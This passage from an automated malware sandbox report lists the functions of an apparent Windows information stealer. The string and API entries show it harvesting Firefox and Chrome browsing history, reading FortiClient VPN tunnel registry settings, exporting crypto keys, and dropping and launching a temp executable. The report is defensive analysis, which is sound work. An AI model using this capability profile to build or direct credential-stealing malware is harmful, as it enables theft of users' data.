                                                                                                                            • Instruction Fuzzy Hash: F0A1E262B193A186EB20EF6AA4441AEB7A1FB85B90F904435FF4D47B68DF3CD404CB10
                                                                                                                            Function 00007FF7CBCAFB38 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 65stringfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
                                                                                                                            • String ID: *.default-release$APPDATA$\places.sqlite
                                                                                                                            • API String ID: 4154822446-3438982840
                                                                                                                            • Opcode ID: d7269cf17e5b33c1795cd74e29e03c46c3fcc247abef41597c81738ae3b3c5ab
                                                                                                                            • Instruction ID: 7eb6d6815c48e2eb840a4e401327f2b9555f07e48b0030d78361369698673b25
                                                                                                                            • Opcode Fuzzy Hash: d7269cf17e5b33c1795cd74e29e03c46c3fcc247abef41597c81738ae3b3c5ab
                                                                                                                            • Instruction Fuzzy Hash: C5317E21A6895795EF20EF28E8401ECB321FB447A4F805531EB5D866B8EF7CD609C760
                                                                                                                            Function 00007FF7CBCAB428 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 310COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Card$CardsFreeListMemory$ChangeStatus
                                                                                                                            • String ID: "_": ""$%02X
                                                                                                                            • API String ID: 2879528921-1880646522
                                                                                                                            • Opcode ID: ed3753db07ca822bcdf5eb1dcea464b8db1005cad956ddba30dfc57e14472201
                                                                                                                            • Instruction ID: 6381b21cb0d82621204be191d0b1f6029b86583f9900d7515943ffb6df5854b7
                                                                                                                            • Opcode Fuzzy Hash: ed3753db07ca822bcdf5eb1dcea464b8db1005cad956ddba30dfc57e14472201
                                                                                                                            • Instruction Fuzzy Hash: 5DD18125B4862344EB24FFBAA8911FD93559F427E4BC46831FE1E476B6DE2CE505C320
                                                                                                                            Function 00007FF7CBCA78EC Relevance: 6.1, APIs: 4, Instructions: 56libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$AddressCurrentLibraryLoadProcWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4035193891-0
                                                                                                                            • Opcode ID: 8f7d0afc07ad77c62296da18ea9598441e0f30d9eecd5f53e8fc3d6832e69a3e
                                                                                                                            • Instruction ID: 2285ad3153c1e8ec3d20ebf9eaceeb206452ac6247ea434b8ca897a8757c1492
                                                                                                                            • Opcode Fuzzy Hash: 8f7d0afc07ad77c62296da18ea9598441e0f30d9eecd5f53e8fc3d6832e69a3e
                                                                                                                            • Instruction Fuzzy Hash: 5821C2629287D186EA206F39A4441BEE790FB597A0F444236EFCD02B56DF2CC1148B10
                                                                                                                            Function 00007FF7CBCA36F0 Relevance: 3.1, APIs: 2, Instructions: 58encryptionCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptExport$HeapProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 532797600-0
                                                                                                                            • Opcode ID: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                                                                            • Instruction ID: 4c64412673d5c67ef531edd78247eaaea40d53e08cd506f3da49597a62e7ca26
                                                                                                                            • Opcode Fuzzy Hash: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                                                                            • Instruction Fuzzy Hash: 00218332A1965692EB60EF19F55036AB3A0EBC4BA8F409530FB5D877A4DF3CE5058B10
                                                                                                                            Function 00007FF7CBCAFF3C Relevance: 18.1, APIs: 12, Instructions: 91filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2161876737-0
                                                                                                                            • Opcode ID: 063b78b404f5c96bf7d67d942382568fb73c345fad3f326a6c542ad15abcefa6
                                                                                                                            • Instruction ID: d4c6046b0308ddc5d347696d353386161d7125f346da47c226e1110c37c10c82
                                                                                                                            • Opcode Fuzzy Hash: 063b78b404f5c96bf7d67d942382568fb73c345fad3f326a6c542ad15abcefa6
                                                                                                                            • Instruction Fuzzy Hash: 6731A221A1866282EB34EF2AB85876DB691BB89BF1F844234EE5D077B4DF3CD4058610
                                                                                                                            Function 00007FF7CBCA1CBC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65filetimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
                                                                                                                            • String ID: %08X.exe$open
                                                                                                                            • API String ID: 2307396689-1771423410
                                                                                                                            • Opcode ID: 8de0e536810cab89fbb532c5864f35491e90b95316bd22bc7e796462d49f8046
                                                                                                                            • Instruction ID: bc22bdc9dacb4c5f79717b01a1c6cf1408bbb2fa178b1a6876831ecace2257cc
                                                                                                                            • Opcode Fuzzy Hash: 8de0e536810cab89fbb532c5864f35491e90b95316bd22bc7e796462d49f8046
                                                                                                                            • Instruction Fuzzy Hash: 7E31A472A58A959AE730DF24E8887EDA361FB88799F804135EB4D07968DF3CC60DC710
                                                                                                                            Function 00007FF7CBCAF988 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 96stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
                                                                                                                            • String ID: Default$LOCALAPPDATA$\History
                                                                                                                            • API String ID: 3980575106-3555721359
                                                                                                                            • Opcode ID: a9490f531bca9e2a9df176b31feed2a3c8fdbf660a9032f732405aecd540a554
                                                                                                                            • Instruction ID: b7be00025489ff9f301fc98dad1984381a4233d518af88ffe46c56a5f85ceb46
                                                                                                                            • Opcode Fuzzy Hash: a9490f531bca9e2a9df176b31feed2a3c8fdbf660a9032f732405aecd540a554
                                                                                                                            • Instruction Fuzzy Hash: B2513422E18B9582E750EF28E5011AC7370F798794F459621EF8D53666EF34E6D9C310
                                                                                                                            Function 00007FF7CBCAFC70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInitializeInstanceUninitialize
                                                                                                                            • String ID: http
                                                                                                                            • API String ID: 948891078-2541227442
                                                                                                                            • Opcode ID: da779b66130cb05ef608860a343e0f9fb267a85ae6c6f153e63f2b0c7d92370d
                                                                                                                            • Instruction ID: 7f2a95367ed809eb812c62ff10a21b664470dcd6a2692b52cb664b83b223414e
                                                                                                                            • Opcode Fuzzy Hash: da779b66130cb05ef608860a343e0f9fb267a85ae6c6f153e63f2b0c7d92370d
                                                                                                                            • Instruction Fuzzy Hash: 75418332B18A5295EB20AF79E4503ADB7A0FB84B99F404536EB4D8AA78DF3CD544C310
                                                                                                                            Function 00007FF7CBCA9478 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81timesynchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
                                                                                                                            • String ID: exit
                                                                                                                            • API String ID: 1626563136-1626635026
                                                                                                                            • Opcode ID: 157560532fddbdd474931b5b94a5a6403812c246ff955327fdeda3b2fbfc7b7d
                                                                                                                            • Instruction ID: 2e9ef2f64ff315d7e1fbf3e064a0f43b944050b35b94edb632f75db1f3fb1445
                                                                                                                            • Opcode Fuzzy Hash: 157560532fddbdd474931b5b94a5a6403812c246ff955327fdeda3b2fbfc7b7d
                                                                                                                            • Instruction Fuzzy Hash: 9B319322A1851281EBA0FF29D44627DA3A1EF84BA4FD41931FB0E865B9DF6CD845C320
                                                                                                                            Function 00007FF7CBCA1EEC Relevance: 12.2, APIs: 8, Instructions: 152commemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1750269033-0
                                                                                                                            • Opcode ID: 35f14d03cfaf8c97af958c557d0a79d7db1ea00b24c4592062ca6e010514b8e8
                                                                                                                            • Instruction ID: f24121a38b8713f310a24284731861189f029925216073e93d03df4df7b981ac
                                                                                                                            • Opcode Fuzzy Hash: 35f14d03cfaf8c97af958c557d0a79d7db1ea00b24c4592062ca6e010514b8e8
                                                                                                                            • Instruction Fuzzy Hash: AF614D32B58A1695EB24AF69D4503AC73B0FB48B98F844432EF0D5BB68DF39D509C360
                                                                                                                            Function 00007FF7CBCAEEDC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00007FF7CBCA25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CBCA1985,?,?,?,00007FF7CBCA155F), ref: 00007FF7CBCA25E5
                                                                                                                            • __memcpy.DELAYIMP ref: 00007FF7CBCAEF63
                                                                                                                              • Part of subcall function 00007FF7CBCB0114: __memcpy.DELAYIMP ref: 00007FF7CBCB0145
                                                                                                                              • Part of subcall function 00007FF7CBCB0114: __memcpy.DELAYIMP ref: 00007FF7CBCB0153
                                                                                                                              • Part of subcall function 00007FF7CBCAEB94: lstrlenA.KERNEL32 ref: 00007FF7CBCAEBB1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: GetProcessHeap.KERNEL32 ref: 00007FF7CBCA25C1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: RtlFreeHeap.NTDLL ref: 00007FF7CBCA25CF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                            • String ID: last_visit_date$moz_places$table$url
                                                                                                                            • API String ID: 2336645791-66087218
                                                                                                                            • Opcode ID: 557a3c6594f34c1c2268f7d356880dc065484ba3f2c21b151f8bf6fb891685af
                                                                                                                            • Instruction ID: 3fe8002c2aa6b48fe906cba093c669dcb85d7c0b10ee194525471793428ac52d
                                                                                                                            • Opcode Fuzzy Hash: 557a3c6594f34c1c2268f7d356880dc065484ba3f2c21b151f8bf6fb891685af
                                                                                                                            • Instruction Fuzzy Hash: 9D31766260865241DE30AF2AA4901AAA750FB85BE0FC04532EF4D977A5EE7CD546C720
                                                                                                                            Function 00007FF7CBCAF108 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00007FF7CBCA25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CBCA1985,?,?,?,00007FF7CBCA155F), ref: 00007FF7CBCA25E5
                                                                                                                            • __memcpy.DELAYIMP ref: 00007FF7CBCAF18F
                                                                                                                              • Part of subcall function 00007FF7CBCB0114: __memcpy.DELAYIMP ref: 00007FF7CBCB0145
                                                                                                                              • Part of subcall function 00007FF7CBCB0114: __memcpy.DELAYIMP ref: 00007FF7CBCB0153
                                                                                                                              • Part of subcall function 00007FF7CBCAEB94: lstrlenA.KERNEL32 ref: 00007FF7CBCAEBB1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: GetProcessHeap.KERNEL32 ref: 00007FF7CBCA25C1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: RtlFreeHeap.NTDLL ref: 00007FF7CBCA25CF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                            • String ID: last_visit_time$table$url$urls
                                                                                                                            • API String ID: 2336645791-3896411411
                                                                                                                            • Opcode ID: 50821f25f0cb2751fab6b95a68dc4b7fcf46b3044d28eb552ffeba5f77d45c67
                                                                                                                            • Instruction ID: 418d2e29a6a1f5572bb911d458a1f0c28042c39dcc09c0ec4ec9588864681fce
                                                                                                                            • Opcode Fuzzy Hash: 50821f25f0cb2751fab6b95a68dc4b7fcf46b3044d28eb552ffeba5f77d45c67
                                                                                                                            • Instruction Fuzzy Hash: E431636160C79281EE70EE2EE4501EAA750FB84BA0F808531EF9D877A6EF3CD545C720
                                                                                                                            Function 00007FF7CBCAECBC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00007FF7CBCA25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CBCA1985,?,?,?,00007FF7CBCA155F), ref: 00007FF7CBCA25E5
                                                                                                                            • __memcpy.DELAYIMP ref: 00007FF7CBCAED43
                                                                                                                              • Part of subcall function 00007FF7CBCB0114: __memcpy.DELAYIMP ref: 00007FF7CBCB0145
                                                                                                                              • Part of subcall function 00007FF7CBCB0114: __memcpy.DELAYIMP ref: 00007FF7CBCB0153
                                                                                                                              • Part of subcall function 00007FF7CBCAEB94: lstrlenA.KERNEL32 ref: 00007FF7CBCAEBB1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: GetProcessHeap.KERNEL32 ref: 00007FF7CBCA25C1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: RtlFreeHeap.NTDLL ref: 00007FF7CBCA25CF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                            • String ID: last_visit_time$table$url$urls
                                                                                                                            • API String ID: 2336645791-3896411411
                                                                                                                            • Opcode ID: 152a2d5ca8424219c1645b7db4641ab7528640e05460c9e3818a3068e443641a
                                                                                                                            • Instruction ID: 8ae440521657a4c1cdbe7de0dde9cfef882de36cea4fa0c2e7d90c1297c5cfb3
                                                                                                                            • Opcode Fuzzy Hash: 152a2d5ca8424219c1645b7db4641ab7528640e05460c9e3818a3068e443641a
                                                                                                                            • Instruction Fuzzy Hash: BE31536260869345EF30AE2AA4501AAF750BB85BA0F904431EF4D47BA5EE3CD555C750
                                                                                                                            Function 00007FF7CBCAE3AC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AppendPathlstrcpy
                                                                                                                            • String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
                                                                                                                            • API String ID: 3043196718-4231764533
                                                                                                                            • Opcode ID: 41717d2b28b12b861b56b77c4a305ba195c6b11fe973075c33dbed15fd8a1f2e
                                                                                                                            • Instruction ID: b7c672c18bd4f773f9c0932136f8b45aaf7ef2b8c9b943350211a2e6d6be3f30
                                                                                                                            • Opcode Fuzzy Hash: 41717d2b28b12b861b56b77c4a305ba195c6b11fe973075c33dbed15fd8a1f2e
                                                                                                                            • Instruction Fuzzy Hash: 94319E61654AA281DB20AF69E8442E9B365FB88BE0F944532FF5D077A9CF3CD504C710
                                                                                                                            Function 00007FF7CBCA1DE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateValue
                                                                                                                            • String ID: ?
                                                                                                                            • API String ID: 1818849710-1684325040
                                                                                                                            • Opcode ID: 95ba9ea116202154f80c3a303d626d01697fe8fb572a65aab9065d47d504427e
                                                                                                                            • Instruction ID: bb0c4077df1a6cc5451e933fa63c94025fb4ec515e44db7c5b6446156dd1b2cc
                                                                                                                            • Opcode Fuzzy Hash: 95ba9ea116202154f80c3a303d626d01697fe8fb572a65aab9065d47d504427e
                                                                                                                            • Instruction Fuzzy Hash: 1E21C773A147908EE7209F75A8402EDB7A4FB597A8B944225EB8C07B59DF3CC144CB10
                                                                                                                            Function 00007FF7CBCAE604 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
